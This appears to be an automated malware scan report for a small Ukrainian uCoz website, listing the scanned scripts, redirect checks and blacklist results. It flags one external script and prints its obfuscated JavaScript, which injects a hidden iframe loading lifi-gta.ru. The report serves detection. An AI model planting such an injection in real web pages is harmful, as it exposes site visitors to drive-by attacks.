Scanned pages/files
Request | Server response | Status |
http://trudolub-sad.ucoz.ua/ | 200 OK Content-Length: 188109 Content-Type: text/html | clean |
http://s68.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s68.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s68.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://trudolub-sad.ucoz.ua/rtr/1-5 | 200 OK Content-Length: 182 Content-Type: text/javascript | clean |
http://trudolub-sad.ucoz.ua/rtr/1-3 | 200 OK Content-Length: 192 Content-Type: text/javascript | clean |
http://trudolub-sad.ucoz.ua/rtr/1-4 | 200 OK Content-Length: 223 Content-Type: text/javascript | clean |
http://trudolub-sad.ucoz.ua/rtr/1-2 | 200 OK Content-Length: 183 Content-Type: text/javascript | clean |
http://trudolub-sad.ucoz.ua/rtr/1-1 | 200 OK Content-Length: 181 Content-Type: text/javascript | clean |
http://lifi-gta.ru/jogin_form_javascript.js | 200 OK Content-Length: 192 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://lifi-gta.ru'; wishyhd.appendChild(emptiestag); | ||
http://trudolub-sad.ucoz.ua/informer/12 | 200 OK Content-Length: 2528 Content-Type: text/html | clean |
http://trudolub-sad.ucoz.ua/informer/\"javascript://\" | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://trudolub-sad.ucoz.ua/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://feedjit.com/serve/?vv=1500&tft=3&dd=0&wid=8eb23015083ec7b9c41f9194c5a84b4c&pid=0&proid=0&bc=FFFFFF&tc=575757&brd1=DEDE1B&lnk=659BD6&hc=611561&hfc=F09C0C&btn=358EFA&ww=185&wne=7&srefs=0 | 200 OK Content-Length: 44273 Content-Type: application/x-javascript | clean |
http://romale80.ucoz.ru/translation/rome.js | 200 OK Content-Length: 7591 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trudolub-sad.ucoz.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 Feb 2015 10:35:13 GMT
Server: uServ/3.2.2
Content-Length: 188109
Content-Type: text/html; charset=UTF-8
...188109 bytes of data.
GET / HTTP/1.1
Host: trudolub-sad.ucoz.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 Feb 2015 10:35:13 GMT
Server: uServ/3.2.2
Content-Length: 188109
Content-Type: text/html; charset=UTF-8
...188109 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trudolub-sad.ucoz.ua
Referer: http://www.google.com/search?q=trudolub-sad.ucoz.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trudolub-sad.ucoz.ua
Referer: http://www.google.com/search?q=trudolub-sad.ucoz.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trudolub-sad.ucoz.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trudolub-sad.ucoz.ua/
Result: trudolub-sad.ucoz.ua is not infected or malware details are not published yet.
Result: trudolub-sad.ucoz.ua is not infected or malware details are not published yet.